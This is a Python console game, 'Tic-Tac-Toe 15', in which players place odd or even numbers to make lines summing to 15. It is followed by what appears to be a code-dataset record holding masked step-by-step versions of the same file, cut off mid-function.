print("\nINVALID INPUT, Please try again and enter a number that you haven't used. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter a EVEN number. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif p2_move_input < 1 or p2_move_input > 9:
print("\nINVALID INPUT, Please try again and enter a number between 1-9. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID, Please try again and enter an unoccupied spot. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
except ValueError:
print("\nINVALID INPUT, Please try again and enter only in integers. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
# Function that checks if any three numbers in a row/column/diagonal add up to 15. If there is, the function returns is_game_over and the game ends.
def check_game(board, winner):
is_game_over = ""
if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1] != 0 and board[2] != 0:
print_board(board)
print("\n"+str(board[0])+",", str(board[1])+",", "and", str(board[2]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4] != 0 and board[5] != 0:
print_board(board)
print("\n"+str(board[3])+",", str(board[4])+",", "and", str(board[5]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7] != 0 and board[8] != 0:
print_board(board)
print("\n"+str(board[6])+",", str(board[7])+",", "and", str(board[8]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3] != 0 and board[6] != 0:
print_board(board)
print("\n"+str(board[0])+",", str(board[3])+",", "and", str(board[6]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4] != 0 and board[7] != 0:
print_board(board)
print("\n"+str(board[1])+",", str(board[4])+",", "and", str(board[7]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5] != 0 and board[8] != 0:
print_board(board)
print("\n"+str(board[2])+",", str(board[5])+",", "and", str(board[8]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4] != 0 and board[2] != 0:
print_board(board)
print("\n"+str(board[6])+",", str(board[4])+",", "and", str(board[2]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4] != 0 and board[8] != 0:
print_board(board)
print("\n"+str(board[0])+",", str(board[4])+",", "and", str(board[8]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
return is_game_over
# Function that prints the scoreboard and the scores of the two players. Prints after a round has ended.
def score(score1, score2, player1, player2):
print("\n\t------------------")
print("\t SCOREBOARD")
print("\t------------------")
print("\t" + " " + player1 + ":", score1)
print("\t" + " " + player2 + ":", score2)
print("\t------------------")
print()
# Function that is where most of the game takes place. Function calls other functions such as make_move_and_update, choose_who_first, score and other code that make up the game.
# Function keeps track of the player order, the board, unavailable moves, amount of rounds and other variables. The game ends in a draw when count reaches 9. At the end of the round, it asks the users if they want to play again.
def play_game(score1, score2, player1, player2):
unavailable_moves_p1 = []
unavailable_moves_p2 = []
player_order = []
the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]
count = 0
restart = ""
turn = choose_who_first(player1, player2, player_order)
input("Enter anything to start the round: ")
for i in range(10):
print_board(the_board)
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
count += 1
if check_game(the_board, turn):
if turn == player1:
score1 += 1
elif turn == player2:
score2 += 1
break
if count == 9:
print("No numbers added up to 15, it's a DRAW! ")
break
if turn == player1:
turn = player2
else:
turn = player1
input("\nEnter anything to continue: ")
score(score1, score2, player1, player2)
# Asks if the players want to restart. If yes, it calls the play_game function. If no, it ends the game and congratulates the overall winner.
while restart != "yes" or restart != "y" or restart != "n" or restart != "no":
restart = input("Do want to play Again? (y/n) ").lower()
if restart == "y" or restart == "yes":
print("\nLoading new round...")
play_game(score1, score2, player1, player2)
elif restart == "n" or restart == "no":
if score1 > score2:
print("\n"+player1, "is the overall winner! Congratulations!")
elif score2 > score1:
print("\n"+player2, "is the overall winner! Congratulations!")
elif score1 == score2:
print("\nBoth players have one the same amount of rounds. It's a draw! ")
print("\nThanks for playing! ")
break
else:
print("\nPlease enter YES or NO ")
print()
# This code manages the important things before the actual game starts such as the instructions, usernames, etc. Calls the play_game function.
if __name__ == "__main__":
intro()
input("Enter anything to continue: ")
print("\nEnter usernames: ")
name1 = input("\nPlayer 1, Enter your name: ").title()
name2 = input("\nPlayer 2, Enter your name: ").title()
p1_score = 0
p2_score = 0
play_game(p1_score, p2_score, name1, name2)
|
normal
|
{
"blob_id": "11259c92b005a66e5f3c9592875f478df199c813",
"index": 6993,
"step-1": "<mask token>\n\n\ndef intro():\n print(\n \"\"\"\n####### ####### ####### # ####### \n # # #### # ## #### # #### ###### ## # \n # # # # # # # # # # # # # # # # \n # # # ##### # # # # ##### # # # ##### # ###### \n # # # # ###### # # # # # # # \n # # # # # # # # # # # # # # # # \n # # #### # # # #### # #### ###### ##### ##### \n\nHow to play Tic-Tac-Toe 15: \n\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \n\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \nthe boxes as shown below. Players can can only enter from numbers from 1-9. \n\n | |\n\t 1 | 2 | 3\n\t_____|_____|_____\n\t | |\n\t 4 | 5 | 6\n\t_____|_____|_____\n\t | |\n\t 7 | 8 | 9\n\t | |\n \"\"\"\n )\n\n\n<mask token>\n\n\ndef choose_who_first(player1, player2, player_order):\n flip = random.randint(1, 2)\n if flip == 1:\n print('\\n' + player1, 'goes first.', player1,\n 'can only play odd numbers and', player2,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player1)\n player_order.append(player2)\n return player1\n elif flip == 2:\n print('\\n' + player2, 'goes first.', player2,\n 'can only play odd numbers and', name1,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player2)\n player_order.append(player1)\n return player2\n\n\ndef make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order):\n odd_moves = [1, 3, 5, 7, 9]\n even_moves = [2, 4, 6, 8]\n try:\n if turn == player1:\n print('\\nIts your turn', player1 + ': ')\n print()\n p1_move_input = int(input('Move to which space? 
(1-9): '))\n if player_order[0] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p1_num_input in odd_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p1_num_input in even_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. 
'\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n if turn == player2:\n print('\\nIts your turn', player2 + ': ')\n print()\n p2_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p2_num_input in odd_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. 
'\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p2_num_input in even_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n except ValueError:\n print('\\nINVALID INPUT, Please try again and enter only in integers. ')\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n\n\ndef check_game(board, winner):\n is_game_over = ''\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[1]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! 
')\n is_game_over = True\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4\n ] != 0 and board[5] != 0:\n print_board(board)\n print('\\n' + str(board[3]) + ',', str(board[4]) + ',', 'and', str(\n board[5]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[7]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3\n ] != 0 and board[6] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[3]) + ',', 'and', str(\n board[6]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4\n ] != 0 and board[7] != 0:\n print_board(board)\n print('\\n' + str(board[1]) + ',', str(board[4]) + ',', 'and', str(\n board[7]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[2]) + ',', str(board[5]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[4]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[4]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! 
')\n is_game_over = True\n return is_game_over\n\n\ndef score(score1, score2, player1, player2):\n print('\\n\\t------------------')\n print('\\t SCOREBOARD')\n print('\\t------------------')\n print('\\t' + ' ' + player1 + ':', score1)\n print('\\t' + ' ' + player2 + ':', score2)\n print('\\t------------------')\n print()\n\n\ndef play_game(score1, score2, player1, player2):\n unavailable_moves_p1 = []\n unavailable_moves_p2 = []\n player_order = []\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n count = 0\n restart = ''\n turn = choose_who_first(player1, player2, player_order)\n input('Enter anything to start the round: ')\n for i in range(10):\n print_board(the_board)\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n count += 1\n if check_game(the_board, turn):\n if turn == player1:\n score1 += 1\n elif turn == player2:\n score2 += 1\n break\n if count == 9:\n print(\"No numbers added up to 15, it's a DRAW! \")\n break\n if turn == player1:\n turn = player2\n else:\n turn = player1\n input('\\nEnter anything to continue: ')\n score(score1, score2, player1, player2)\n while (restart != 'yes' or restart != 'y' or restart != 'n' or restart !=\n 'no'):\n restart = input('Do want to play Again? (y/n) ').lower()\n if restart == 'y' or restart == 'yes':\n print('\\nLoading new round...')\n play_game(score1, score2, player1, player2)\n elif restart == 'n' or restart == 'no':\n if score1 > score2:\n print('\\n' + player1, 'is the overall winner! Congratulations!'\n )\n elif score2 > score1:\n print('\\n' + player2, 'is the overall winner! Congratulations!'\n )\n elif score1 == score2:\n print(\n \"\\nBoth players have one the same amount of rounds. It's a draw! \"\n )\n print('\\nThanks for playing! ')\n break\n else:\n print('\\nPlease enter YES or NO ')\n print()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef intro():\n print(\n \"\"\"\n####### ####### ####### # ####### \n # # #### # ## #### # #### ###### ## # \n # # # # # # # # # # # # # # # # \n # # # ##### # # # # ##### # # # ##### # ###### \n # # # # ###### # # # # # # # \n # # # # # # # # # # # # # # # # \n # # #### # # # #### # #### ###### ##### ##### \n\nHow to play Tic-Tac-Toe 15: \n\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \n\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \nthe boxes as shown below. Players can can only enter from numbers from 1-9. \n\n | |\n\t 1 | 2 | 3\n\t_____|_____|_____\n\t | |\n\t 4 | 5 | 6\n\t_____|_____|_____\n\t | |\n\t 7 | 8 | 9\n\t | |\n \"\"\"\n )\n\n\ndef print_board(board):\n print('\\n\\t | |')\n print('\\t {} | {} | {}'.format(board[0], board[1], board[2]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[3], board[4], board[5]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[6], board[7], board[8]))\n print('\\t | |')\n\n\ndef choose_who_first(player1, player2, player_order):\n flip = random.randint(1, 2)\n if flip == 1:\n print('\\n' + player1, 'goes first.', player1,\n 'can only play odd numbers and', player2,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player1)\n player_order.append(player2)\n return player1\n elif flip == 2:\n print('\\n' + player2, 'goes first.', player2,\n 'can only play odd numbers and', name1,\n 'can only play even numbers from 1-9. 
')\n print()\n player_order.append(player2)\n player_order.append(player1)\n return player2\n\n\ndef make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order):\n odd_moves = [1, 3, 5, 7, 9]\n even_moves = [2, 4, 6, 8]\n try:\n if turn == player1:\n print('\\nIts your turn', player1 + ': ')\n print()\n p1_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p1_num_input in odd_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. 
'\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p1_num_input in even_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n if turn == player2:\n print('\\nIts your turn', player2 + ': ')\n print()\n p2_move_input = int(input('Move to which space? 
(1-9): '))\n if player_order[0] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p2_num_input in odd_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p2_num_input in even_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. 
'\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n except ValueError:\n print('\\nINVALID INPUT, Please try again and enter only in integers. ')\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n\n\ndef check_game(board, winner):\n is_game_over = ''\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[1]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4\n ] != 0 and board[5] != 0:\n print_board(board)\n print('\\n' + str(board[3]) + ',', str(board[4]) + ',', 'and', str(\n board[5]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[7]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3\n ] != 0 and board[6] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[3]) + ',', 'and', str(\n board[6]), 'add up to 15! ')\n print('\\n' + winner, 'wins! 
')\n is_game_over = True\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4\n ] != 0 and board[7] != 0:\n print_board(board)\n print('\\n' + str(board[1]) + ',', str(board[4]) + ',', 'and', str(\n board[7]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[2]) + ',', str(board[5]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[4]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[4]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! 
')\n is_game_over = True\n return is_game_over\n\n\ndef score(score1, score2, player1, player2):\n print('\\n\\t------------------')\n print('\\t SCOREBOARD')\n print('\\t------------------')\n print('\\t' + ' ' + player1 + ':', score1)\n print('\\t' + ' ' + player2 + ':', score2)\n print('\\t------------------')\n print()\n\n\ndef play_game(score1, score2, player1, player2):\n unavailable_moves_p1 = []\n unavailable_moves_p2 = []\n player_order = []\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n count = 0\n restart = ''\n turn = choose_who_first(player1, player2, player_order)\n input('Enter anything to start the round: ')\n for i in range(10):\n print_board(the_board)\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n count += 1\n if check_game(the_board, turn):\n if turn == player1:\n score1 += 1\n elif turn == player2:\n score2 += 1\n break\n if count == 9:\n print(\"No numbers added up to 15, it's a DRAW! \")\n break\n if turn == player1:\n turn = player2\n else:\n turn = player1\n input('\\nEnter anything to continue: ')\n score(score1, score2, player1, player2)\n while (restart != 'yes' or restart != 'y' or restart != 'n' or restart !=\n 'no'):\n restart = input('Do want to play Again? (y/n) ').lower()\n if restart == 'y' or restart == 'yes':\n print('\\nLoading new round...')\n play_game(score1, score2, player1, player2)\n elif restart == 'n' or restart == 'no':\n if score1 > score2:\n print('\\n' + player1, 'is the overall winner! Congratulations!'\n )\n elif score2 > score1:\n print('\\n' + player2, 'is the overall winner! Congratulations!'\n )\n elif score1 == score2:\n print(\n \"\\nBoth players have one the same amount of rounds. It's a draw! \"\n )\n print('\\nThanks for playing! ')\n break\n else:\n print('\\nPlease enter YES or NO ')\n print()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef intro():\n print(\n \"\"\"\n####### ####### ####### # ####### \n # # #### # ## #### # #### ###### ## # \n # # # # # # # # # # # # # # # # \n # # # ##### # # # # ##### # # # ##### # ###### \n # # # # ###### # # # # # # # \n # # # # # # # # # # # # # # # # \n # # #### # # # #### # #### ###### ##### ##### \n\nHow to play Tic-Tac-Toe 15: \n\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \n\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \nthe boxes as shown below. Players can can only enter from numbers from 1-9. \n\n | |\n\t 1 | 2 | 3\n\t_____|_____|_____\n\t | |\n\t 4 | 5 | 6\n\t_____|_____|_____\n\t | |\n\t 7 | 8 | 9\n\t | |\n \"\"\"\n )\n\n\ndef print_board(board):\n print('\\n\\t | |')\n print('\\t {} | {} | {}'.format(board[0], board[1], board[2]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[3], board[4], board[5]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[6], board[7], board[8]))\n print('\\t | |')\n\n\ndef choose_who_first(player1, player2, player_order):\n flip = random.randint(1, 2)\n if flip == 1:\n print('\\n' + player1, 'goes first.', player1,\n 'can only play odd numbers and', player2,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player1)\n player_order.append(player2)\n return player1\n elif flip == 2:\n print('\\n' + player2, 'goes first.', player2,\n 'can only play odd numbers and', name1,\n 'can only play even numbers from 1-9. 
')\n print()\n player_order.append(player2)\n player_order.append(player1)\n return player2\n\n\ndef make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order):\n odd_moves = [1, 3, 5, 7, 9]\n even_moves = [2, 4, 6, 8]\n try:\n if turn == player1:\n print('\\nIts your turn', player1 + ': ')\n print()\n p1_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p1_num_input in odd_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, 